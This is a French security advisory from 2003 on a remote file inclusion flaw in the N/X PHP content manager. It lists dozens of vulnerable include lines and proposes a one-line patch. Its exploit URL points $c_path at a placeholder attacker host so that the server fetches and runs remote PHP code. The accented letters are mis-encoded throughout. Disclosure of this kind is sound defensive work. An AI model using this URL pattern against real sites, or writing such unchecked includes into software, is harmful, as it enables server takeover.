							N/X
							***

Informations :
АААААААААААААА
Langage : PHP
Website : http://nxwcms.sourceforge.net/
Version : 2002 PreRelease 1
Problшme : - Inclusions de fichiers


Developpement : 
ААААААААААААААА
N/X est un CMS (Content Manager System) permettant de crщer un site et de l'administrer.

Le problшme est classique, une variable est modifiable pas n'importe qui, ce qui permet d'inclure un fichier externe,
et de faire executer du code php avec les droits et restrictions du serveur.
Ici la variable modifiable est $c_path.
Par exemple dans le fichier nx/common/cds/menu.inc.php, on peut voir :
-----------------------------------------------------------
[...]
	require_once $c_path."common/lib/launch.inc.php";
[...]
-----------------------------------------------------------

Pour inclure le fichier http://[attacker]/common/lib/launch.inc.php dans http://[target]/nx/common/cds/menu.inc.php,
il faudra taper l'url :
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/

Voici les differents fichiers et leur code buggщ...

nx/common/dbo/datasets.php :
-----------------------------------------------------------
<?
	require_once $c_path."common/dbo/saveset.php";
	require_once $c_path."common/dbo/recordset.php";
	require_once $c_path."common/dbo/deleteset.php";
	require_once $c_path."common/dbo/updateset.php";
	require_once $c_path."common/dbo/insertset.php";
[...]
-----------------------------------------------------------

nx/common/dbo/dbo.php :
-----------------------------------------------------------
<?
 require_once $c_path."common/dbo/validator.php";
 require_once $c_path."common/dbo/va_unique.php";
 require_once $c_path."common/dbo/va_mandatory.php";
[...]
-----------------------------------------------------------

nx/common/dbo/duration_input.php :
-----------------------------------------------------------
<?
	require_once $c_path."common/dbo/time_input.php";
[...]
-----------------------------------------------------------

nx/common/dbo/frmo.php :
-----------------------------------------------------------
<?php
	require_once $c_path."common/dbo/date_time_input.php";
	require_once $c_path."common/dbo/select_multiple2_input.php";
	require_once $c_path."common/dbo/nondisplayed_value.php";
	require_once $c_path."common/dbo/nondisplayed_value_oninsert.php";
	require_once $c_path."common/dbo/password_input.php";
	require_once $c_path."common/dbo/select_one_input.php";
	require_once $c_path."common/dbo/select_one_input_fixed.php";
	require_once $c_path."common/dbo/checkbox_input.php";
	require_once $c_path."common/dbo/text_input.php";
	require_once $c_path."common/dbo/date_input.php";
	require_once $c_path."common/dbo/displayed_value.php";
[...]
-----------------------------------------------------------

nx/common/dbo/time_input.php :
-----------------------------------------------------------
<?
	require_once $c_path."common/wui/timebox.php";
?>
-----------------------------------------------------------

nx/common/lang/Italian/lang.inc.php, nx/common/lang/Deutsch/lang.inc.php, nx/common/lang/English/lang.inc.php, 
nx/common/lang/Mandarin/lang.inc.php et nx/common/lang/Polish/lang.inc.php :
-----------------------------------------------------------
[...]
 require_once $c_path."common/lang/lang.php";
[...]
-----------------------------------------------------------

nx/common/lib/copy.inc.php :
-----------------------------------------------------------
<?
  require_once $c_path."common/dbo/saveset.php";
  require_once $c_path."common/dbo/createset.php";
  require_once $c_path."common/lib/datatypes.inc.php";
  //require_once $c_path."common/dbo/dbinfo.php";
[...]
-----------------------------------------------------------

nx/common/lib/copy_tree.inc :
-----------------------------------------------------------
<?
  require_once $c_path."common/lib/copy.inc.php";
[...]
-----------------------------------------------------------

nx/common/lib/database.php :
-----------------------------------------------------------
<?php
 require_once $c_path."common/lib/query.php";
[...]
-----------------------------------------------------------

nx/common/lib/launch.inc.php :
-----------------------------------------------------------
<?
    require_once $c_path."common/logic/cache.inc.php";
[...]
-----------------------------------------------------------

nx/common/lib/mass_opeations.inc.php :
-----------------------------------------------------------
<?
  require_once $c_path."common/lib/launch.inc.php";
  require_once $c_path."common/cds/menu.inc.php";
[...]
-----------------------------------------------------------

nx/common/logic/journal.php :
-----------------------------------------------------------
<?
    require_once $c_path."common/lib/launch.inc.php";
[...]
-----------------------------------------------------------

nx/common/res/folder_logic.inc.php :
-----------------------------------------------------------
<?
 if (isset($action)) {
[...]
 	} else if ($action=="delfolder") {
 		require_once $c_path."common/wui/commitform.php";
[...]
-----------------------------------------------------------

nx/common/wui/cluster_envelope.inc.php :
-----------------------------------------------------------
<?
require_once $c_path."common/logic/tableorder.inc.php";
require_once $c_path."common/dbo/cl_selector.php";
[...]
-----------------------------------------------------------

nx/common/wui/containerform.php et content_envelope.inc.php :
-----------------------------------------------------------
<?
require_once $c_path."common/logic/tableorder.inc.php";
[...]
-----------------------------------------------------------

nx/common/wui/dnly.php :
-----------------------------------------------------------
<?
 	require_once $c_path."common/wui/button_in_cell.php";
 	require_once $c_path."common/wui/textarea.php";
 	require_once $c_path."common/wui/date_timebox.php";
 	require_once $c_path."common/wui/datebox.php";
 	require_once $c_path."common/wui/select.php";
 	require_once $c_path."common/wui/dropdown.php";
 	require_once $c_path."common/wui/filebox.php";
 	require_once $c_path."common/wui/checkbox.php";
 	require_once $c_path."common/wui/radio.php";
 	require_once $c_path."common/wui/input.php";
 	require_once $c_path."common/wui/button.php";
 	require_once $c_path."common/wui/html_container.php";
 	require_once $c_path."common/wui/color_input.php";
 	require_once $c_path."common/wui/date_timebox_js.php";
 	require_once $c_path."common/wui/datebox_js.php";
 ?>
-----------------------------------------------------------

nx/common/wui/filtermenu.php :
-----------------------------------------------------------
<?
 	require_once $c_path."common/wui/filter.php";
[...]
-----------------------------------------------------------

nx/common/wui/library_envelope.inc.php :
-----------------------------------------------------------
<?
require_once $c_path."common/logic/tableorder.inc.php";
require_once $c_path."common/dbo/ci_selector.php";
[...]
-----------------------------------------------------------

nx/common/wui/stly.php :
-----------------------------------------------------------
<?
 	require_once $c_path."common/wui/hidden.php";
 	require_once $c_path."common/wui/cell.php";
	require_once $c_path."common/wui/label.php";
	require_once $c_path."common/wui/aligned_label.php";
	require_once $c_path."common/wui/formsplitter.php";
	require_once $c_path."common/wui/buttonbar.php";
	require_once $c_path."common/wui/separator.php";
 ?>
-----------------------------------------------------------

nx/modules/pot/prepend.php :
-----------------------------------------------------------
<?
require_once $c_path.'modules/pot/src/phpOpenTracker.php';
[...]
-----------------------------------------------------------

nx/modules/resources/panel_cluster.inc.php :
-----------------------------------------------------------
<?
 require_once $c_path."common/wui/cluster_envelope.inc.php";
 require_once $c_path."common/wui/content_envelope.inc.php";
 require_once $c_path."common/wui/library_envelope.inc.php";
[...]
-----------------------------------------------------------

nx/modules/sitepages/logic_selectcluster.inc.php :
-----------------------------------------------------------
<?php
	require_once $c_path."common/dbo/cl_selector.php";
[...]
-----------------------------------------------------------

nx/plugin/image/pgn_image.php :
-----------------------------------------------------------
<?
  require_once $c_path."plugin/image/imageupload.inc.php";
[...]
-----------------------------------------------------------

nx/plugin/media/pgn_media.php :
-----------------------------------------------------------
<?
  require_once $c_path."plugin/media/mediaupload.inc.php";
[...]
-----------------------------------------------------------


Patch :
ААААААА
Rajouter au dщbut de chaque fichier buggщ la ligne :
-----------------------------------------------------------------
if (!file_exists($c_path."index.php")){ die("Path not found."); }
-----------------------------------------------------------------

Un patch est tщlщchargeable sur http://www.phpsecure.org.


Credits :
ААААААААА
Auteur : frog-m@n
E-mail : frog-man@frog-man.org
Website : http://www.phpsecure.org, http://www.frog-man.org
Date : 02/01/03